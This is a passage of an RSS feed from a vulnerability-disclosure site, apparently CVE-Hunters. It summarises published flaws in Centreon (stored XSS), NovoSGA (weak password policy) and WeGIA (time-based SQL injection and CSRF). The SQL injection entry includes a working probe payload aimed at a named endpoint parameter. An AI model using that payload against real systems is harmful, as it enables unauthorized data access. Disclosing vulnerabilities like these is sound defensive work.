  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-8430-centreon-web-all-versions-medium-severity-5118&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-8430-centreon-web-all-versions-medium-severity-5118&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 14 Oct 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8459</title>
        <link>https://www.cvehunters.com/p/cve-2025-8459/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-8459/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8459-cross-site-scripting-xss-stored-in-centreon-infra-monitoring&amp;#34;&amp;gt;CVE-2025-8459: Cross-Site Scripting (XSS) Stored in Centreon Infra Monitoring
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8459&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8459&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A user with low privileges can inject XSS in the Monitoring Recurrent downtimes page.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Improper Neutralization of Input During Web Page Generation (XSS or &amp;#39;Cross-site Scripting&amp;#39;) vulnerability in Centreon Infra Monitoring (Monitoring recurrent downtime scheduler modules) allows Stored XSS.This issue affects Infra Monitoring: from 24.10.0 before 24.10.13, from 24.04.0 before 24.04.18, from 23.10.0 before 23.10.28.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8459-cross-site-scripting-xss-stored-in-centreon-infra-monitoring&amp;#34;&amp;gt;CVE-2025-8459: Cross-Site Scripting (XSS) Stored in Centreon Infra Monitoring
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8459&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8459&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A user with low privileges can inject XSS in the Monitoring Recurrent downtimes page.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Improper Neutralization of Input During Web Page Generation (XSS or &amp;#39;Cross-site Scripting&amp;#39;) vulnerability in Centreon Infra Monitoring (Monitoring recurrent downtime scheduler modules) allows Stored XSS.This issue affects Infra Monitoring: from 24.10.0 before 24.10.13, from 24.04.0 before 24.04.18, from 23.10.0 before 23.10.28.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-8459-centreon-web-all-versions-high-severity-5117&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-8459-centreon-web-all-versions-high-severity-5117&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 14 Oct 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-11322</title>
        <link>https://www.cvehunters.com/p/cve-2025-11322/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-11322/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-11322-weak-password-policy-vulnerability-in-create-new-user-function&amp;#34;&amp;gt;CVE-2025-11322: Weak Password Policy Vulnerability in Create new User Function
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-11322&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-11322&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Weak Password Policy vulnerability was identified in the user registration functionality of the Novosga application. This vulnerability allows the creation of accounts with extremely weak and predictable passwords, such as &amp;lt;code&amp;gt;123456&amp;lt;/code&amp;gt;. This exposes the platform to brute-force and credential stuffing attacks.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to enforce a strong password policy. As a result, users can register accounts with trivial and well-known weak passwords, compromising the authentication security of the platform..&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-11322-weak-password-policy-vulnerability-in-create-new-user-function&amp;#34;&amp;gt;CVE-2025-11322: Weak Password Policy Vulnerability in Create new User Function
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-11322&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-11322&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Weak Password Policy vulnerability was identified in the user registration functionality of the Novosga application. This vulnerability allows the creation of accounts with extremely weak and predictable passwords, such as &amp;lt;code&amp;gt;123456&amp;lt;/code&amp;gt;. This exposes the platform to brute-force and credential stuffing attacks.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to enforce a strong password policy. As a result, users can register accounts with trivial and well-known weak passwords, compromising the authentication security of the platform..&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Vulnerable Component: &amp;lt;code&amp;gt;User registration / password creation&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h3&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Navigate to the user registration page after logged in with the Administrator account.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Create a new user account with the password &amp;lt;code&amp;gt;123456&amp;lt;/code&amp;gt;.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;The application accepts the weak password without restrictions and creates the account successfully.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-11322/image.png&amp;#34;
	width=&amp;#34;942&amp;#34;
	height=&amp;#34;739&amp;#34;
	srcset=&amp;#34;/p/cve-2025-11322/image_hu_5efc7146b11f1523.png 480w, /p/cve-2025-11322/image_hu_ad16b066d772cdf2.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;127&amp;#34;
		data-flex-basis=&amp;#34;305px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-11322/image-1.png&amp;#34;
	width=&amp;#34;939&amp;#34;
	height=&amp;#34;784&amp;#34;
	srcset=&amp;#34;/p/cve-2025-11322/image-1_hu_6250a21d35ef1c30.png 480w, /p/cve-2025-11322/image-1_hu_2a40994e5a3ad755.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;119&amp;#34;
		data-flex-basis=&amp;#34;287px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Increased risk of brute-force and credential stuffing attacks.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Unauthorized access to user or administrative accounts.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Privilege escalation through compromised accounts.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Reduced overall security posture of the application.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/NovoSga/CVE-2025-11322.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/NovoSga/CVE-2025-11322.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 06 Oct 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-61603</title>
        <link>https://www.cvehunters.com/p/cve-2025-61603/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-61603/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-61603-sql-injection-blind-time-based-vulnerability-in-id_pet-parameter-on-petprofile_petphp-endpoint&amp;#34;&amp;gt;CVE-2025-61603: SQL Injection (Blind Time-Based) Vulnerability in &amp;lt;code&amp;gt;id_pet&amp;lt;/code&amp;gt; Parameter on &amp;lt;code&amp;gt;/pet/profile_pet.php&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-61603&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-61603&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was discovered in the &amp;lt;code&amp;gt;id_pet&amp;lt;/code&amp;gt; parameter of the &amp;lt;code&amp;gt;/pet/profile_pet.php&amp;lt;/code&amp;gt; endpoint. This issue allows any attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly sanitize user-supplied input in the &amp;lt;code&amp;gt;id_pet&amp;lt;/code&amp;gt; parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-61603-sql-injection-blind-time-based-vulnerability-in-id_pet-parameter-on-petprofile_petphp-endpoint&amp;#34;&amp;gt;CVE-2025-61603: SQL Injection (Blind Time-Based) Vulnerability in &amp;lt;code&amp;gt;id_pet&amp;lt;/code&amp;gt; Parameter on &amp;lt;code&amp;gt;/pet/profile_pet.php&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-61603&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-61603&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was discovered in the &amp;lt;code&amp;gt;id_pet&amp;lt;/code&amp;gt; parameter of the &amp;lt;code&amp;gt;/pet/profile_pet.php&amp;lt;/code&amp;gt; endpoint. This issue allows any attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly sanitize user-supplied input in the &amp;lt;code&amp;gt;id_pet&amp;lt;/code&amp;gt; parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/pet/profile_pet.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;id_pet&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&#43;AND&#43;SLEEP(10)
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-61603/image.png&amp;#34;
	width=&amp;#34;1531&amp;#34;
	height=&amp;#34;708&amp;#34;
	srcset=&amp;#34;/p/cve-2025-61603/image_hu_d3891178922f3b57.png 480w, /p/cve-2025-61603/image_hu_9215cc27c0e46de.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;216&amp;#34;
		data-flex-basis=&amp;#34;518px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Observe the time delay in the server response, indicating the successful execution of the SQL payload.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Unauthorized access to sensitive data (e.g., users, passwords, logs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Database enumeration (schemas, tables, users, versions).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Full compromise of the application if chained with other vulnerabilities.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-8963-9833-gpx7&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-8963-9833-gpx7&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Thu, 02 Oct 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-61604</title>
        <link>https://www.cvehunters.com/p/cve-2025-61604/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-61604/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-61604-cross-site-request-forgery-csrf-vulnerability-in-almoxarifadocontrole-class-delete-get-on-controlphp-endpoint&amp;#34;&amp;gt;CVE-2025-61604: Cross-Site Request Forgery (CSRF) Vulnerability in &amp;lt;code&amp;gt;AlmoxarifadoControle&amp;lt;/code&amp;gt; class Delete (GET) on &amp;lt;code&amp;gt;control.php&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-61604&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-61604&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Cross-Site Request Forgery (CSRF) vulnerability was identified in the WeGIA application. The delete operation for the &amp;lt;code&amp;gt;Almoxarifado&amp;lt;/code&amp;gt; entity is exposed via &amp;lt;code&amp;gt;HTTP GET&amp;lt;/code&amp;gt; without CSRF protection, allowing a third-party site to trigger the action using the victim’s authenticated session.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;GET /WeGIA/controle/control.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
